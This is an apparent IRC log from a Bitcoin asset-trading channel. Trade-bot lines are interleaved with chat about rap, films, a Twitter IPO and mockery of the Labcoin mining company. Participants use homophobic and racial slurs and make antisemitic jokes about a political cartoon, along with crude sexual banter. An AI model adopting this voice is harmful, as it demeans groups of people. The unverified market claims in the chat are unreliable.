BTC [-] Sep 13 04:23:51 [MPEX] [S.MPOE] 11050 @ 0.00089854 = 9.9289 BTC [-] Sep 13 04:25:17 its a gay jay z song about a tom ford suit Sep 13 04:25:36 listen to jay-z some time and tell me if that assclown has any talent..meh Sep 13 04:25:51 disclaimer..just my opinion..who am i to judge art. Sep 13 04:25:59 [BTCTC] [LABCOIN] 315 @ 0.003272 = 1.0307 BTC [+] Sep 13 04:26:02 gay-z Sep 13 04:26:08 HAHA +1 Sep 13 04:26:18 dick sucking lips - nas Sep 13 04:26:42 sounds like you need some nas - ether Sep 13 04:27:15 btw i dont mind that jay-z album at least timbaland was really messed up on drugs and pumpt out a few decent beats Sep 13 04:27:27 [BTCTC] [LABCOIN] 47 @ 0.00313 = 0.1471 BTC [-] Sep 13 04:27:29 now timbo in rehab Sep 13 04:27:41 [BTCTC] [LABCOIN] 53 @ 0.00313 = 0.1659 BTC [-] Sep 13 04:27:43 [BTCTC] [LABCOIN] 26 @ 0.003129 = 0.0814 BTC [-] Sep 13 04:28:27 KRS1 does he even claim he;'s making art ? Sep 13 04:28:28 TOM FORD Sep 13 04:28:31 afaik he's making money. Sep 13 04:28:38 I DON'T POP MOLLY I ROCK TOM FORD Sep 13 04:28:44 INTERNATIONAL BRING BACK THE CONCORDE Sep 13 04:28:46 jkjk Sep 13 04:28:55 [BTCTC] [BASIC-MINING] 2 @ 0.126 = 0.252 BTC [-] Sep 13 04:29:15 he claims he is making art Sep 13 04:29:17 jayz's talent lies in his timing Sep 13 04:29:29 he's the modern day pissaco Sep 13 04:29:41 with leonardo da vinci flooooows Sep 13 04:29:52 his delivery compensates for his actual lyrics Sep 13 04:30:12 o gtfo. Sep 13 04:30:21 pissaco, srsly ? Sep 13 04:30:24 [BTCTC] [RSM] 3 @ 0.003625 = 0.0109 BTC [+] Sep 13 04:30:51 thats just rap exaggeration Sep 13 04:30:52 picasso babbby Sep 13 04:30:54 nothing new Sep 13 04:31:36 and he sleeps ever night next to mona lisa, the modern day version with better features Sep 13 04:31:54 like a cup holder? Sep 13 04:31:56 mona lisa looks like a frog. Sep 13 04:32:12 i doubt he sleeps with her, or has the patience to jack off to vague gender ambiguous smiles. Sep 13 04:32:23 i suspect jay z is gay anyway Sep 13 04:32:32 lol Sep 13 04:32:38 jay z is gai for mona lisa ? Sep 13 04:32:57 watch interviews, he's an odd timid sort Sep 13 04:33:14 i defer to better informed ppl. Sep 13 04:33:34 kendrick lamar has a similar disposition Sep 13 04:33:40 everyone talking about that kendrick lamar control verse Sep 13 04:33:47 good Sep 13 04:33:54 rap needs beef Sep 13 04:34:03 [HAVELOCK] [AM100] 6 @ 0.0202 = 0.1212 BTC [-] Sep 13 04:34:30 bitcoin beef Sep 13 04:35:04 I have beef with ThickAsThieves Sep 13 04:35:12 meanwhile in kazakhstan Sep 13 04:35:12 He dissed mah rhymes Sep 13 04:35:14 Kendrick Lamar DUCKWORTH !? Sep 13 04:35:15 http://www.eurasianet.org/node/67497 Sep 13 04:35:15 ahahahaaa Sep 13 04:35:19 Looking to Impress Your Girl? Service in Kazakhstan Sells Heroism | EurasiaNet.org Sep 13 04:35:48 i thought bitcoiners would be more into aphextwin, squarepusher, venetiansnares Sep 13 04:36:23 nope Sep 13 04:36:28 [BTCTC] [ASICMINER-PT] 4 @ 3 = 12 BTC [+] Sep 13 04:36:33 we're grown up wiggers Sep 13 04:36:41 oh wow 3btc Sep 13 04:36:48 rally! Sep 13 04:37:00 dub so basically like the government, only supplied by private sector. Sep 13 04:37:07 was that an options haha Sep 13 04:37:11 options yeh Sep 13 04:37:16 :) Sep 13 04:37:17 should print Sep 13 04:37:22 shouldnt* Sep 13 04:37:26 assume there was some sort of AM update? Sep 13 04:37:30 yah, false flag for teh massess Sep 13 04:37:33 confused the tape Sep 13 04:37:37 matuszed old discussion this. Sep 13 04:37:41 friedcat about to drop his album Sep 13 04:37:44 there's no talking to the experts in their own mind. Sep 13 04:37:54 Sleeps with the Fishes Sep 13 04:38:04 freazy Sep 13 04:38:09 +1 title Sep 13 04:38:45 Friedcat & The Watermelon Seeds Sep 13 04:38:54 in other news, yeazy is on the rock Sep 13 04:39:06 http://www.youtube.com/watch?v=pCT8cwHTEos&feature=youtu.be Sep 13 04:39:07 Kanye West Goes Off While Introducing Pusha T - YouTube Sep 13 04:39:31 i feel for him gotta be hard being married to an ass Sep 13 04:39:50 dat ass tho Sep 13 04:39:54 indeed Sep 13 04:40:48 man i would just put on a navy diving suit like the one cuban goddy wears and i would just dive so deep in that bitch and setup a tent and hammock n stuff and just live in there till i suffocate to death Sep 13 04:40:50 does he rub is teeth at any moment? Sep 13 04:41:10 haha Sep 13 04:42:17 naked lunch reference? Sep 13 04:42:54 [BTCTC] [LABCOIN] 9 @ 0.003269 = 0.0294 BTC [+] Sep 13 04:42:57 nah Sep 13 04:43:11 [HAVELOCK] [LABCO] 7 @ 0.00300001 = 0.021 BTC [-] Sep 13 04:43:13 just a reference to people doing coke Sep 13 04:43:22 friedcat published pics of his DC too Sep 13 04:43:30 http://www.hugchina.com/china/stories/china-economy/sky-houses-supported-by-pillars-appear-on-building-rooftop-in-dongguan-2013-09-11.html Sep 13 04:43:33 Sky houses supported by pillars appear on building rooftop in Dongguan - China Economy Sep 13 04:43:47 [HAVELOCK] [XBOND] 11 @ 0.001135 = 0.0125 BTC [-] Sep 13 04:43:57 nah. just a reference to people doing coke << bwahahaha Sep 13 04:44:01 kickass answer. Sep 13 04:44:16 [HAVELOCK] [LABCO] 4 @ 0.00300001 = 0.012 BTC [-] Sep 13 04:44:46 [HAVELOCK] [XBOND] 20 @ 0.001135 = 0.0227 BTC [-] Sep 13 04:45:14 [HAVELOCK] [LABCO] 7 @ 0.00300001 = 0.021 BTC [-] Sep 13 04:48:17 in naked lunch its bugpowder tho Sep 13 04:48:36 anyone seen the cronenberg version ? Sep 13 04:49:09 naked lunch i own that Sep 13 04:49:14 theres another version? Sep 13 04:49:25 critereon collection Sep 13 04:49:31 try reading the book Sep 13 04:49:32 :) Sep 13 04:49:35 maybe i will Sep 13 04:50:49 ;;seen bugpowder Sep 13 04:50:49 bugpowder was last seen in #bitcoin-assets 7 weeks, 2 days, 8 hours, 4 minutes, and 13 seconds ago: SEC! Sep 13 04:50:50 dub i read the book. Sep 13 04:50:52 hater. Sep 13 04:51:20 its a wohle new level of mindfuck from teh movie Sep 13 04:52:00 bwahahah okay, this you are NOT going to believe. Sep 13 04:52:19 so i have two girls living together in an apt not far from local campus. Sep 13 04:52:48 neighbour dood just knocked on the door, because "he just worked out and then discovered he has no protein in the house and he must have some. do they have anything ?" Sep 13 04:52:53 it's 4 am here. Sep 13 04:52:59 this was the dood's pickup line. Sep 13 04:53:16 is he in? Sep 13 04:53:29 lol, "hey you ladies got any beef sticks?" Sep 13 04:53:33 so they opened him a can of tuna and he spent fifteen minutes eating that and trying to hit on two bisexual sex slaves. Sep 13 04:53:38 yeah thats aan old one Sep 13 04:53:39 "no? would you like one?" Sep 13 04:53:49 yea Sep 13 04:54:02 it must suck to be like... people. Sep 13 04:54:37 [MPEX] [S.MPOE] 1550 @ 0.00089854 = 1.3927 BTC [-] Sep 13 04:54:39 [MPEX] [S.MPOE] 16250 @ 0.00089612 = 14.562 BTC [-] Sep 13 04:56:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.02119 = 0.0848 BTC [-] Sep 13 04:56:56 [BTCTC] [LABCOIN] 10 @ 0.003269 = 0.0327 BTC [+] Sep 13 04:56:57 [BTCTC] [LABCOIN] 10 @ 0.00327 = 0.0327 BTC [+] Sep 13 04:56:58 [BTCTC] [LABCOIN] 327 @ 0.003284 = 1.0739 BTC [+] Sep 13 04:56:58 [BTCTC] [LABCOIN] 60 @ 0.003286 = 0.1972 BTC [+] Sep 13 04:57:00 [BTCTC] [LABCOIN] 12 @ 0.003287 = 0.0394 BTC [+] Sep 13 04:57:01 [BTCTC] [LABCOIN] 12 @ 0.003288 = 0.0395 BTC [+] Sep 13 04:57:02 [BTCTC] [LABCOIN] 1163 @ 0.003293 = 3.8298 BTC [+] Sep 13 04:57:03 [BTCTC] [LABCOIN] 400 @ 0.003294 = 1.3176 BTC [+] Sep 13 04:57:04 [BTCTC] [LABCOIN] 1095 @ 0.003296 = 3.6091 BTC [+] Sep 13 04:57:05 [BTCTC] [LABCOIN] 400 @ 0.003333 = 1.3332 BTC [+] Sep 13 04:57:06 [BTCTC] [LABCOIN] 1000 @ 0.003344 = 3.344 BTC [+] Sep 13 04:57:07 [BTCTC] [LABCOIN] 95 @ 0.003345 = 0.3178 BTC [+] Sep 13 04:57:08 [BTCTC] [LABCOIN] 416 @ 0.003346 = 1.3919 BTC [+] Sep 13 04:58:47 [BTCTC] [LABCOIN] 3 @ 0.003293 = 0.0099 BTC [-] Sep 13 04:59:07 mod6: another one, 'say, do you have a little italian in you? do you want some?' Sep 13 04:59:15 lol yah Sep 13 04:59:39 oh and so much for no formal or public response (yesterday): Carney added, "The United States, in part because it is an exceptional nation, is called upon the lead in situations like this." Sep 13 04:59:43 *sigh* Sep 13 05:00:07 lol Sep 13 05:00:26 mod6 allow me to linkwhor : http://trilema.com/2013/sudetenland-or-kwestia-polska/ Sep 13 05:01:06 [BTCTC] [LABCOIN] 267 @ 0.003317 = 0.8856 BTC [+] Sep 13 05:01:06 [BTCTC] [LABCOIN] 98 @ 0.003319 = 0.3253 BTC [+] Sep 13 05:01:08 [BTCTC] [LABCOIN] 99 @ 0.003345 = 0.3312 BTC [+] Sep 13 05:01:23 [BTCTC] [LABCOIN] 584 @ 0.003346 = 1.9541 BTC [+] Sep 13 05:01:24 [BTCTC] [LABCOIN] 6809 @ 0.003349 = 22.8033 BTC [+] Sep 13 05:01:26 [BTCTC] [LABCOIN] 267 @ 0.003349 = 0.8942 BTC [+] Sep 13 05:01:28 [BTCTC] [LABCOIN] 96 @ 0.003349 = 0.3215 BTC [+] Sep 13 05:01:42 [BTCTC] [LABCOIN] 267 @ 0.003349 = 0.8942 BTC [+] Sep 13 05:01:59 [BTCTC] [LABCOIN] 99 @ 0.003343 = 0.331 BTC [-] Sep 13 05:02:01 [BTCTC] [LABCOIN] 2054 @ 0.003398 = 6.9795 BTC [+] Sep 13 05:02:16 [BTCTC] [LABCOIN] 97 @ 0.003398 = 0.3296 BTC [+] Sep 13 05:02:18 [BTCTC] [RSM] 1 @ 0.009 BTC [+] Sep 13 05:02:25 lol billy mays Sep 13 05:02:27 [BTCTC] [LABCOIN] 150 @ 0.00342 = 0.513 BTC [+] Sep 13 05:02:29 [BTCTC] [LABCOIN] 480 @ 0.00342 = 1.6416 BTC [+] Sep 13 05:02:30 [BTCTC] [LABCOIN] 60 @ 0.003448 = 0.2069 BTC [+] Sep 13 05:02:31 [BTCTC] [LABCOIN] 1258 @ 0.003455 = 4.3464 BTC [+] Sep 13 05:02:47 [BTCTC] [LABCOIN] 115 @ 0.003455 = 0.3973 BTC [+] Sep 13 05:02:48 billy mays! Sep 13 05:03:00 [BTCTC] [LABCOIN] 1000 @ 0.003419 = 3.419 BTC [-] Sep 13 05:03:01 [BTCTC] [LABCOIN] 100 @ 0.003448 = 0.3448 BTC [+] Sep 13 05:03:19 [BTCTC] [LABCOIN] 1654 @ 0.003486 = 5.7658 BTC [+] Sep 13 05:03:21 [BTCTC] [LABCOIN] 1000 @ 0.003487 = 3.487 BTC [+] Sep 13 05:04:01 *sniff* Sep 13 05:04:14 [BTCTC] [LABCOIN] 100 @ 0.003488 = 0.3488 BTC [+] Sep 13 05:04:15 [BTCTC] [LABCOIN] 476 @ 0.003489 = 1.6608 BTC [+] Sep 13 05:04:16 [BTCTC] [LABCOIN] 1600 @ 0.003491 = 5.5856 BTC [+] Sep 13 05:04:17 [BTCTC] [LABCOIN] 324 @ 0.003492 = 1.1314 BTC [+] Sep 13 05:05:19 rip billy mays Sep 13 05:06:13 [BTCTC] [ACTIVEMINING] 44 @ 0.003038 = 0.1337 BTC [+] Sep 13 05:06:14 [BTCTC] [ACTIVEMINING] 25 @ 0.003005 = 0.0751 BTC [-] Sep 13 05:06:16 [BTCTC] [ACTIVEMINING] 100 @ 0.003004 = 0.3004 BTC [-] Sep 13 05:06:17 [BTCTC] [ACTIVEMINING] 1000 @ 0.003003 = 3.003 BTC [-] Sep 13 05:06:18 [BTCTC] [ACTIVEMINING] 1000 @ 0.003002 = 3.002 BTC [-] Sep 13 05:06:19 [BTCTC] [ACTIVEMINING] 3000 @ 0.003 = 9 BTC [-] Sep 13 05:07:11 [BTCTC] [LABCOIN] 100 @ 0.00346 = 0.346 BTC [-] Sep 13 05:07:12 [BTCTC] [LABCOIN] 450 @ 0.003489 = 1.5701 BTC [+] Sep 13 05:07:22 [BTCTC] [LABCOIN] 2171 @ 0.003489 = 7.5746 BTC [+] Sep 13 05:07:23 [BTCTC] [LABCOIN] 676 @ 0.003492 = 2.3606 BTC [+] Sep 13 05:07:24 [BTCTC] [LABCOIN] 1153 @ 0.003493 = 4.0274 BTC [+] Sep 13 05:08:05 [BTCTC] [LABCOIN] 400 @ 0.003493 = 1.3972 BTC [+] Sep 13 05:08:17 [MPEX] [S.MPOE] 350 @ 0.0008967 = 0.3138 BTC [+] Sep 13 05:08:51 This actually says, in point of fact, “we have defeated the Nazis once before, and we shall defeat the Nazis again, irrespective of whether you choose to be part of “we” or part of “Nazis”.” << this Sep 13 05:10:42 [BTCTC] [LABCOIN] 60 @ 0.00349 = 0.2094 BTC [-] Sep 13 05:10:44 [BTCTC] [LABCOIN] 440 @ 0.003492 = 1.5365 BTC [+] Sep 13 05:11:05 [BTCTC] [LABCOIN] 60 @ 0.003492 = 0.2095 BTC [+] Sep 13 05:11:06 [BTCTC] [LABCOIN] 2647 @ 0.003493 = 9.246 BTC [+] Sep 13 05:11:07 [BTCTC] [LABCOIN] 2000 @ 0.003494 = 6.988 BTC [+] Sep 13 05:11:09 [BTCTC] [LABCOIN] 2050 @ 0.003495 = 7.1648 BTC [+] Sep 13 05:11:10 [BTCTC] [LABCOIN] 2380 @ 0.003496 = 8.3205 BTC [+] Sep 13 05:11:10 [BTCTC] [LABCOIN] 2000 @ 0.003499 = 6.998 BTC [+] Sep 13 05:11:11 [BTCTC] [LABCOIN] 4000 @ 0.0035 = 14 BTC [+] Sep 13 05:11:12 [BTCTC] [LABCOIN] 200 @ 0.0035 = 0.7 BTC [+] Sep 13 05:11:13 [BTCTC] [LABCOIN] 2 @ 0.0035 = 0.007 BTC [+] Sep 13 05:12:11 [BTCTC] [TAT.ASICMINER] 15 @ 0.02119 = 0.3179 BTC [-] Sep 13 05:12:38 [BTCTC] [DMS.PURCHASE] 1 @ 0.01195 BTC [-] Sep 13 05:13:46 panic buy labcoin!!1!111!!!! Sep 13 05:14:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.02147 BTC [+] Sep 13 05:14:42 [BTCTC] [LABCOIN] 2600 @ 0.00355 = 9.23 BTC [+] Sep 13 05:14:51 lmao Sep 13 05:15:03 panic...buy Sep 13 05:15:08 i get it Sep 13 05:15:11 these labcoin scammers are such fucktards. Sep 13 05:15:14 but these people are insane. Sep 13 05:15:17 fucktards? Sep 13 05:15:18 he just logged in a minute ago. Sep 13 05:15:22 or geniuses? Sep 13 05:15:31 this is his idea of a "pump". Sep 13 05:15:35 favorite quote thus far from a mining operation - present to you Labcoin on the date they will prove they are actually hashing: "We do not have 10 TH of chips out of nowhere, we said that we will setup block labeling as soon as we reach that speed, which could be on the first days of october, so in "about" two weeks, or mid october. We will outsource deployment and assembly for the next batch of c Sep 13 05:15:35 hips so that we will proceed at a much faster pace in the future." Sep 13 05:16:02 [BTCTC] [LABCOIN] 4661 @ 0.0035 = 16.3135 BTC [-] Sep 13 05:16:08 making announcements to announce an announcement or something Sep 13 05:16:16 winning strategy. Sep 13 05:16:18 apple used to do that Sep 13 05:16:22 it worked well Sep 13 05:16:25 in about two weeks or mid october? Sep 13 05:16:26 First days of October, "in about two weeks", or mid October. LOL all in one sentence. Sep 13 05:16:28 hmmm Sep 13 05:16:34 yeah wtf Sep 13 05:16:39 AMAZING COMPANY Sep 13 05:16:39 AMAZING COMPANY! Sep 13 05:16:47 they have a unit Sep 13 05:17:27 logged into bitcointalk? Sep 13 05:17:31 AMUSING CUNTANY! Sep 13 05:19:06 [BTCTC] [ASICMINER-PT] 1 @ 2.151 BTC [-] Sep 13 05:20:29 [BTCTC] [TAT.ASICMINER] 31 @ 0.02098 = 0.6504 BTC [-] Sep 13 05:23:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.02096 = 0.0629 BTC [-] Sep 13 05:23:26 [BTCTC] [LABCOIN] 575 @ 0.003404 = 1.9573 BTC [-] Sep 13 05:24:13 I can't wait to watch LC go bonkers and back tomorrow. Sep 13 05:25:04 [BTCTC] [BASIC-MINING] 1 @ 0.1267 BTC [+] Sep 13 05:25:22 [BTCTC] [BASIC-MINING] 2 @ 0.1414 = 0.2828 BTC [+] Sep 13 05:25:42 http://i.imgur.com/BxjxBywl.jpg Sep 13 05:26:17 lol Sep 13 05:26:38 i get a huge kick out of that thread Sep 13 05:27:52 nobody is panic buying labcoin anymore. SELL SELL SELL!!! Sep 13 05:27:54 wat thread Sep 13 05:28:27 dub the LC IPO thread https://bitcointalk.org/index.php?topic=263445.0 Sep 13 05:28:38 it had like 20 new pages when I woke up Sep 13 05:28:57 watch that thread as the price moves, it's just so much fail Sep 13 05:29:00 [BTCTC] [BASIC-MINING] 2 @ 0.1414 = 0.2828 BTC [+] Sep 13 05:29:01 [BTCTC] [BASIC-MINING] 3 @ 0.1415 = 0.4245 BTC [+] Sep 13 05:29:02 [BTCTC] [BASIC-MINING] 1 @ 0.1415 BTC [+] Sep 13 05:30:06 [BTCTC] [LABCOIN] 3 @ 0.003402 = 0.0102 BTC [-] Sep 13 05:31:14 Dude. I step away from my desktop and come back an hour or so later, hit refresh and have ~8 pages of bullshit to read. lol. Sep 13 05:31:26 ha yep Sep 13 05:31:32 So far I've made a good little profit off of those kiddies. Sep 13 05:32:02 pg 403 is the place to be, swede says definite announce tomorrow at 8pm central Sep 13 05:32:17 Riding the wave of prepubescent emotional trades. Sep 13 05:32:19 man if they miss that one we'll see .002 Sep 13 05:32:22 [BTCTC] [TAT.ASICMINER] 27 @ 0.02098 = 0.5665 BTC [+] Sep 13 05:32:23 [BTCTC] [TAT.ASICMINER] 17 @ 0.02096 = 0.3563 BTC [-] Sep 13 05:32:25 [BTCTC] [TAT.ASICMINER] 10 @ 0.02093 = 0.2093 BTC [-] Sep 13 05:32:26 [BTCTC] [TAT.ASICMINER] 46 @ 0.02092 = 0.9623 BTC [-] Sep 13 05:32:27 lol Sep 13 05:32:28 Yeah Sep 13 05:32:35 If they miss that one, it'll be lolzy. Sep 13 05:32:43 I can't imagine that. Sep 13 05:32:51 should be fun ^.^ Sep 13 05:32:55 The new could be lackluster as well, which would be baaaad. Sep 13 05:33:21 I love how it was 6TH/s, then 4, and now the announce they're hashing at 2 but can't prove it. LOL. Sep 13 05:33:50 right? Sep 13 05:33:56 it's just silly Sep 13 05:34:16 So at this rate they'll be hashing at ~16TH/s by the end of the year. :) Sep 13 05:34:35 You know, if this is how they project/deliver Sep 13 05:34:54 im betting the announcement will be a monarch. Sep 13 05:35:02 Hahahaha. Sep 13 05:35:04 oh gawd Sep 13 05:35:13 except better. Sep 13 05:35:16 "The Monarch will be crowned." Sep 13 05:35:27 Under the Dome? Anyone? Sep 13 05:35:33 [MPEX] [S.MPOE] 1150 @ 0.0008967 = 1.0312 BTC [+] Sep 13 05:35:44 No? Just me? Ok. Sep 13 05:36:03 i'm shocked there wasn't a run on Nasty when OG announced his monarch buy Sep 13 05:36:29 Some silly ideas out there, man. Sep 13 05:36:39 indeed Sep 13 05:36:41 Kleeck tv series, srsly ? Sep 13 05:37:01 Book. Sep 13 05:37:09 Stephen King Sep 13 05:37:13 [BTCTC] [DMS.PURCHASE] 10 @ 0.01195 = 0.1195 BTC [-] Sep 13 05:37:29 a ic. Sep 13 05:37:36 It is a TV series as well. Sep 13 05:37:39 Not very good though. Sep 13 05:37:48 well i never read it so i guess it is just you! Sep 13 05:38:01 yeah. it's not his best work... Sep 13 05:39:02 [HAVELOCK] [CBTC] 20000 @ 0.0004 = 8 BTC [+] Sep 13 05:48:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.02092 = 0.0837 BTC [-] Sep 13 05:49:55 [BTCTC] [TAT.ASICMINER] 3 @ 0.0209 = 0.0627 BTC [-] Sep 13 05:49:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.02089 = 0.0836 BTC [-] Sep 13 05:49:58 [BTCTC] [TAT.ASICMINER] 15 @ 0.02085 = 0.3128 BTC [-] Sep 13 05:49:59 [BTCTC] [TAT.ASICMINER] 25 @ 0.02085 = 0.5213 BTC [-] Sep 13 05:50:01 [BTCTC] [TAT.ASICMINER] 24 @ 0.02084 = 0.5002 BTC [-] Sep 13 05:50:02 [BTCTC] [TAT.ASICMINER] 13 @ 0.02082 = 0.2707 BTC [-] Sep 13 05:50:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.02081 BTC [-] Sep 13 05:50:44 [BTCTC] [DMS.PURCHASE] 3 @ 0.01195 = 0.0359 BTC [-] Sep 13 05:50:59 [BTCTC] [ASICMINER-PT] 1 @ 2.24 BTC [+] Sep 13 05:51:58 Twitter gonna IPO Sep 13 05:52:11 who's gonna ge it up? Sep 13 05:52:16 gem* Sep 13 05:54:26 i'll pass, it will be way overvalued, they don't need the money to grow anyways, the dev team will bail at ipo launch Sep 13 05:54:57 er bail = cash out Sep 13 05:55:07 actually, twitter's business model has always has been investors Sep 13 05:55:27 they consumed millions (billions?) with no plan to make money, for years Sep 13 05:55:57 so they could cash out at IPO Sep 13 05:56:07 yeah, that's my guess Sep 13 05:56:14 leave the bagholders to figure out how to monetize it Sep 13 05:56:15 worse than facebook Sep 13 05:56:34 at least facebook thought about ways to monetize Sep 13 05:57:00 twitter already had multiple rounds of financing Sep 13 05:57:15 i avoided facebook too, imo investing in FB is like betting against google Sep 13 05:58:36 [BTCTC] [LABCOIN] 40 @ 0.00351 = 0.1404 BTC [+] Sep 13 05:58:55 [BTCTC] [DMS.MINING] 49 @ 0.002686 = 0.1316 BTC [+] Sep 13 05:59:24 http://www.usatoday.com/story/money/business/2013/09/12/twitter-ipo-filing/2806703/ Sep 13 05:59:25 With a tweet, Twitter kicks off next big tech IPO Sep 13 05:59:54 they're expecting 583million in advertising revenue for 2013 o.0 Sep 13 05:59:55 [BTCTC] [DMS.MINING] 459 @ 0.002687 = 1.2333 BTC [+] Sep 13 06:00:15 forget everything bad i said about twitter :P Sep 13 06:00:46 Duffer1 has it pretty much. Sep 13 06:02:48 [BTCTC] [DMS.MINING] 95 @ 0.002603 = 0.2473 BTC [-] Sep 13 06:02:49 [BTCTC] [DMS.MINING] 16 @ 0.002601 = 0.0416 BTC [-] Sep 13 06:02:51 [BTCTC] [DMS.MINING] 1 @ 0.0026 BTC [-] Sep 13 06:02:52 [BTCTC] [DMS.MINING] 1 @ 0.0026 BTC [-] Sep 13 06:02:53 [BTCTC] [DMS.MINING] 137 @ 0.002588 = 0.3546 BTC [-] Sep 13 06:03:17 except the betting against google part. betting against facebook may well be equal to betting that the corpse will beat the braindead pacient at table tennis. Sep 13 06:03:25 nevertheless, bets against google are probably winners long term. Sep 13 06:03:48 betting on facebook i mean, not against. meh. Sep 13 06:03:50 [BTCTC] [LABCOIN] 3 @ 0.003399 = 0.0102 BTC [-] Sep 13 06:04:28 http://editorialcartoonists.com/cartoons/SiersK/2013/SiersK20130912_low.jpg Sep 13 06:04:44 obamas answer to mp Sep 13 06:05:10 lol nice Sep 13 06:05:17 [MPEX] [S.MPOE] 6850 @ 0.00089792 = 6.1508 BTC [+] Sep 13 06:05:19 [MPEX] [S.MPOE] 4276 @ 0.00089612 = 3.8318 BTC [-] Sep 13 06:05:55 lol Sep 13 06:06:11 haha Sep 13 06:06:27 why does obama look jewish ? Sep 13 06:06:37 the problem with these newspaper cartoon people is that they can't draw anything but jooz. Sep 13 06:07:22 [HAVELOCK] [HIM] 1 @ 0.15 BTC [-] Sep 13 06:07:22 I think his ears are usually higher Sep 13 06:07:23 [HAVELOCK] [HIM] 17 @ 0.1545 = 2.6265 BTC [+] Sep 13 06:07:31 [BTCTC] [LABCOIN] 1 @ 0.0034 BTC [+] Sep 13 06:07:47 I don't see the jewish in the pic though Sep 13 06:07:51 [BTCTC] [LABCOIN] 1 @ 0.0034 BTC [+] Sep 13 06:07:58 but I'm a bad jewish spotter, despite it being a French tradition Sep 13 06:08:01 ya, right, so they misplaced the ears so this makes him black. Sep 13 06:08:08 look at those motherfucking eyebrows. Sep 13 06:08:29 the entire eye thing screams barakstein Sep 13 06:08:32 oh, right Sep 13 06:08:37 [BTCTC] [LABCOIN] 15 @ 0.0034 = 0.051 BTC [+] Sep 13 06:08:48 barakstein :D Sep 13 06:09:35 da fuck is this even, if the ears are alligned with the eyes it' Sep 13 06:09:46 s dick cheney, if alligned with the mouth its jay-z Sep 13 06:10:03 and supposedly if they put them straight on top of his head it's elizabeth tailor in butterfield 9 Sep 13 06:10:05 8* Sep 13 06:14:05 for the case one of you might wish to include real time trading data in btctalk posts -> http://img.bitwatch.co Sep 13 06:16:01 [BTCTC] [LABCOIN] 262 @ 0.003399 = 0.8905 BTC [-] Sep 13 06:16:02 [BTCTC] [LABCOIN] 698 @ 0.003395 = 2.3697 BTC [-] Sep 13 06:16:05 now that's pretty cool an idea. Sep 13 06:16:10 nice Sep 13 06:16:21 I've seen the same service for BTC price Sep 13 06:16:26 of course it's not really useful for posts, as those speak of something definite and you can't have parts of the message change Sep 13 06:16:30 however, signatures and whatnot Sep 13 06:16:37 signatures or first post Sep 13 06:17:05 nice idea Sep 13 06:18:22 why not dynamically generate teh posts themselves? Sep 13 06:19:54 which posts? Sep 13 06:20:07 all posts Sep 13 06:20:17 while(1){ print "trololol\n"; } Sep 13 06:21:04 lel Sep 13 06:21:36 theres never any actual value in th epost Sep 13 06:24:06 [HAVELOCK] [AM100] 13 @ 0.0202 = 0.2626 BTC [-] Sep 13 06:25:21 mpoe-pr is 50% +1 of the value of all the posts!!! Sep 13 06:30:17 [BTCTC] [ACTIVEMINING] 650 @ 0.0031 = 2.015 BTC [+] Sep 13 06:30:19 [BTCTC] [ACTIVEMINING] 2 @ 0.0031 = 0.0062 BTC [+] Sep 13 06:30:59 [BTCTC] [LABCOIN] 307 @ 0.0034 = 1.0438 BTC [+] Sep 13 06:31:00 [BTCTC] [LABCOIN] 152 @ 0.003487 = 0.53 BTC [+] Sep 13 06:31:34 [HAVELOCK] [AM100] 20 @ 0.0202 = 0.404 BTC [-] Sep 13 06:31:49 [HAVELOCK] [AM100] 2 @ 0.0202 = 0.0404 BTC [-] Sep 13 06:38:34 [BTCTC] [LABCOIN] 1 @ 0.003395 BTC [-] Sep 13 06:41:25 Thanks dexX7 Sep 13 06:43:47 you're welcome :) Sep 13 06:50:51 [BTCTC] [ASICMINER-PT] 1 @ 2.243 BTC [+] Sep 13 06:55:41 [BTCTC] [DMS.SELLING] 3 @ 0.009595 = 0.0288 BTC [+] Sep 13 06:57:29 [BTCTC] [DMS.PURCHASE] 3 @ 0.01195 = 0.0359 BTC [-] Sep 13 06:58:28 [BTCTC] [ACTIVEMINING] 660 @ 0.00305 = 2.013 BTC [-] Sep 13 06:58:29 [BTCTC] [ACTIVEMINING] 178 @ 0.002938 = 0.523 BTC [-] Sep 13 06:58:31 [BTCTC] [ACTIVEMINING] 44 @ 0.002934 = 0.1291 BTC [-] Sep 13 06:58:32 [BTCTC] [ACTIVEMINING] 325 @ 0.002908 = 0.9451 BTC [-] Sep 13 06:58:33 [BTCTC] [ACTIVEMINING] 1000 @ 0.002907 = 2.907 BTC [-] Sep 13 06:58:34 [BTCTC] [ACTIVEMINING] 300 @ 0.002905 = 0.8715 BTC [-] Sep 13 06:59:29 [BTCTC] [DMS.MINING] 3 @ 0.002594 = 0.0078 BTC [+] Sep 13 07:01:47 [BTCTC] [LABCOIN] 250 @ 0.003486 = 0.8715 BTC [+] Sep 13 07:01:49 [BTCTC] [LABCOIN] 130 @ 0.003488 = 0.4534 BTC [+] Sep 13 07:01:49 [BTCTC] [LABCOIN] 50 @ 0.00349 = 0.1745 BTC [+] Sep 13 07:01:50 [BTCTC] [LABCOIN] 265 @ 0.00353 = 0.9355 BTC [+] Sep 13 07:01:51 [BTCTC] [LABCOIN] 500 @ 0.003531 = 1.7655 BTC [+] Sep 13 07:02:04 [BTCTC] [LABCOIN] 130 @ 0.003531 = 0.459 BTC [+] Sep 13 07:02:15 [BTCTC] [LABCOIN] 89 @ 0.003531 = 0.3143 BTC [+] Sep 13 07:03:30 [BTCTC] [LABCOIN] 586 @ 0.003531 = 2.0692 BTC [+] Sep 13 07:05:33 [BTCTC] [ACTIVEMINING] 23 @ 0.003143 = 0.0723 BTC [+] Sep 13 07:05:49 [HAVELOCK] [CBTC] 1 @ 0.00036002 BTC [-] Sep 13 07:06:16 what's the news, mes ami? Sep 13 07:06:32 [HAVELOCK] [CBTC] 10000 @ 0.00041 = 4.1 BTC [+] Sep 13 07:07:21 who's pumping? Sep 13 07:07:23 who's dumping? Sep 13 07:07:33 how many idiots in the corner slumping? Sep 13 07:08:25 (.Y.) Sep 13 07:08:56 I prefer (.)(.) Sep 13 07:09:27 (_|_) Sep 13 07:10:11 8====D Sep 13 07:11:12 ew Sep 13 07:11:40 ( · )( · ) Sep 13 07:14:14 A full B-cup any day...big boobs have sweat and lint under them..stinky. Sep 13 07:15:24 some girls wash. Sep 13 07:16:00 [MPEX] [S.MPOE] 26474 @ 0.00089612 = 23.7239 BTC [-] Sep 13 